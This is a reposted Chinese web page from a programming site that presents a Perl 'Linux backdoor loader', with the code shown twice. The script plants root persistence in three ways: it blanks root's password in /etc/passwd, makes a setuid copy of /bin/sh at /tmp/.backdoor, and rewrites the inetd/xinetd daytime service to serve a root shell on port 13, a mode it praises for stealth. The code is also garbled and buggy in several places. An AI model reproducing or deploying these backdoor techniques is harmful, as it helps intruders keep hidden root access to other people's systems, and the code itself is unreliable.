当前位置: 王朝网络 >> perl >> 用perl写的linux后门加载程序

用perl写的linux后门加载程序

2008-05-19 06:26:00 編輯來源:互聯網简体版手機版評論字體: 小|中|大

　　print "++++++++++++++++++++++++++++++++++++linux后门工具+++++++++++++++++++++++++++++++++++\n";

　　print "使用说明,有三中模式rushroot,fakebackdoor,和rushport,rushroot是加一个账号到passwd中,用户名是root,密码为空n fakebackdoor是绑定一个shell到/tmp/.backdoor下,运行后直接取得root shell,rushport是绑定端口在daytime服务中\n,有两个版本,一个是针对redhatlinux7.0一下的--rushport1,一个是针对redhatlinux7.0以上的--rushport2.\n一般服务器都不开这个服务,程序自动激活daytime服务,telnet到13端口直接取得rootshell 这种方法隐蔽性相对前两中最好\n,记住要重启daytime服务才能生效\n eg: rush rushroot,程序还有很多可以优化的地方,如果有什么好的改进请email to gaomeigaocuo\@hotmail.com\n by 流氓我一生\n";

　　$parameter = @;ARGV[0];

　　chomp $parameter;

　　if ($parameter = "rushroot")

　　{

　　&rushroot;

　　}

　　elsif ($parameter = "fakebackdoor")

　　{

　　&fakebackdoor;

　　}

　　elsif($parameter = "rushport")

　　{

　　&rushport1;

　　}

　　else ($parameter = "rushport2")

　　{

　　&rushport2;

　　}

　　sub rushroot

　　{

　　open (PWD,"/etc/passwd") || die "cannt find the shadow file!\n";

　　while()

　　{

　　chop;

　　$passwd.="$_\n";

　　last;

　　}

　　chomp $passwd;

　　if($passwd eq "root:x:0:0:root:/root:/bin/bash")

　　{

　　$passwd =~s/x//g;

　　print "rushroot success!now you can get a rootshell with null passwd";

　　}

　　else

　　{

　　print "faild....something wrong....:(((";

　　}

　　while()

　　{

　　chomp;

　　$passwd1.="$_\n";

　　}

　　close PWD;

　　open (PWD,"/etc/passwd")||die "why?";

　　print PWD $passwd;

　　print PWD $passwd1;

　　}

　　sub fakebackdoor

　　{

　　@cpsh = ("cp", "/bin/sh /tmp/.backdoor");

　　@chmod= ("chmod","u+s /tmp/.backdoor");

　　system(@cpsh);

　　system(@chmod);

　　print "success! now you can use ./tmp/.backdoor to get a root shell\n";

　　}

　　sub rushport1

　　{

　　open (RH6,"/etc/inetd.d/inetd.conf") || die "cannt find the shadow file!\n"; #这里根据版本不同可自己修改路径

　　while()

　　{

　　chomp;

　　$passwd.="$_\n";

　　chomp $passwd;

　　if ($passwd eq "daytime stream tcp nowait root internal")

　　{

　　$passwd =~s/root internal/bin\/sh -i/g;

　　}

　　last;

　　close RH6;

　　open (RH6,"/etc/inetd.d/inetd.conf")||die "faild...:("; # #这里根据版本不同可自己修改路径

　　print RH6 $passwd;

　　print "success! now you can telnet romote host at port 13 after reboot the daytime session\n";

　　}

　　}

　　sub rushport2

　　{

　　open (DAYTIME,"/etc/xinetd.d/daytime") || die "can't open file!";

　　$daytime = "service daytime\n {\n disable = no\n server =/bin/sh\n server_agrs = --norc\n id = daytime-stream\n socket_type = stream\n protocol = tcp\n user = root\n wait = no\n }\n";

　　print DAYTIME $daytime;

　　print "success! now you can telnet romote host at port 13 after reboot the daytime session\n";

　　}

　　

点击展开全文

猜你喜欢

　　print "++++++++++++++++++++++++++++++++++++linux后门工具+++++++++++++++++++++++++++++++++++\n"; 　　print "使用说明,有三中模式rushroot,fakebackdoor,和rushport,rushroot是加一个账号到passwd中,用户名是root,密码为空n fakebackdoor是绑定一个shell到/tmp/.backdoor下,运行后直接取得root shell,rushport是绑定端口在daytime服务中\n,有两个版本,一个是针对redhatlinux7.0一下的--rushport1,一个是针对redhatlinux7.0以上的--rushport2.\n一般服务器都不开这个服务,程序自动激活daytime服务,telnet到13端口直接取得rootshell 这种方法隐蔽性相对前两中最好\n,记住要重启daytime服务才能生效\n eg: rush rushroot,程序还有很多可以优化的地方,如果有什么好的改进请email to gaomeigaocuo\@hotmail.com\n by 流氓我一生\n"; 　　$parameter = @;ARGV[0]; 　　chomp $parameter; 　　if ($parameter = "rushroot") 　　{ 　　&rushroot; 　　} 　　elsif ($parameter = "fakebackdoor") 　　{ 　　&fakebackdoor; 　　} 　　elsif($parameter = "rushport") 　　{ 　　&rushport1; 　　} 　　else ($parameter = "rushport2") 　　{ 　　&rushport2; 　　} 　　sub rushroot 　　{ 　　open (PWD,"/etc/passwd") || die "cannt find the shadow file!\n"; 　　while() 　　{ 　　chop; 　　$passwd.="$_\n"; 　　last; 　　} 　　chomp $passwd; 　　if($passwd eq "root:x:0:0:root:/root:/bin/bash") 　　{ 　　$passwd =~s/x//g; 　　print "rushroot success!now you can get a rootshell with null passwd"; 　　} 　　else 　　{ 　　print "faild....something wrong....:((("; 　　} 　　while() 　　{ 　　chomp; 　　$passwd1.="$_\n"; 　　} 　　close PWD; 　　open (PWD,"/etc/passwd")||die "why?"; 　　print PWD $passwd; 　　print PWD $passwd1; 　　} 　　sub fakebackdoor 　　{ 　　@cpsh = ("cp", "/bin/sh /tmp/.backdoor"); 　　@chmod= ("chmod","u+s /tmp/.backdoor"); 　　system(@cpsh); 　　system(@chmod); 　　print "success! now you can use ./tmp/.backdoor to get a root shell\n"; 　　} 　　sub rushport1 　　{ 　　open (RH6,"/etc/inetd.d/inetd.conf") || die "cannt find the shadow file!\n"; #这里根据版本不同可自己修改路径　　while() 　　{ 　　chomp; 　　$passwd.="$_\n"; 　　chomp $passwd; 　　if ($passwd eq "daytime stream tcp nowait root internal") 　　{ 　　$passwd =~s/root internal/bin\/sh -i/g; 　　} 　　last; 　　close RH6; 　　open (RH6,"/etc/inetd.d/inetd.conf")||die "faild...:("; # #这里根据版本不同可自己修改路径　　print RH6 $passwd; 　　print "success! now you can telnet romote host at port 13 after reboot the daytime session\n"; 　　} 　　} 　　sub rushport2 　　{ 　　open (DAYTIME,"/etc/xinetd.d/daytime") || die "can't open file!"; 　　$daytime = "service daytime\n {\n disable = no\n server =/bin/sh\n server_agrs = --norc\n id = daytime-stream\n socket_type = stream\n protocol = tcp\n user = root\n wait = no\n }\n"; 　　print DAYTIME $daytime; 　　print "success! now you can telnet romote host at port 13 after reboot the daytime session\n"; 　　} 　　

第二届麻椒少儿艺术大赛首场比赛开启，嘉宾评委阵容曝光

徐磊乐：家是到不了的远方，化作一抹“月光”送给思念的亲人

雷米乐队2018年新专辑《忧郁酒馆》众筹上线

王朝女性健康 \| 评测 \| 品位奢品 \| 娱乐 \| 居家情感 \| 星座 \| 服饰美体 \| 美容 \| 达人亲子 \| 图库 \| 折扣生活 \| 美食 \| 花嫁	王朝分栏美容 \| 探索 \| 母婴健康 \| 旅游 \| 风景家电 \| 珠宝 \| 娱乐学院 \| 资源 \| 家饰汽车 \| 游戏 \| 女性	王朝編程 java/jsp \| c/c++ \| php mysql \| oracle \| mssql vb \| html/css/js \| c# asp \| delphi \| system perl \| vc \| photoshop	王朝简体厨房 \| 养生 \| 美食景区 \| 情感 \| 数码动物 \| 美妆 \| 装修植物 \| 购车 \| 手机首饰 \| 科普 \| 明星	王朝其他家有寵物 \| 英語沙龍軟件設計 \| 電腦技術圖像設計 \| 幽默笑話攻略秘笈 \| 王朝水庫生活百科 \| 娛樂八卦網站推廣 \| 美女圖片
王朝網路手機版	社會百態手機版	歷史軍事手機版	科學探索手機版	娛樂八卦手機版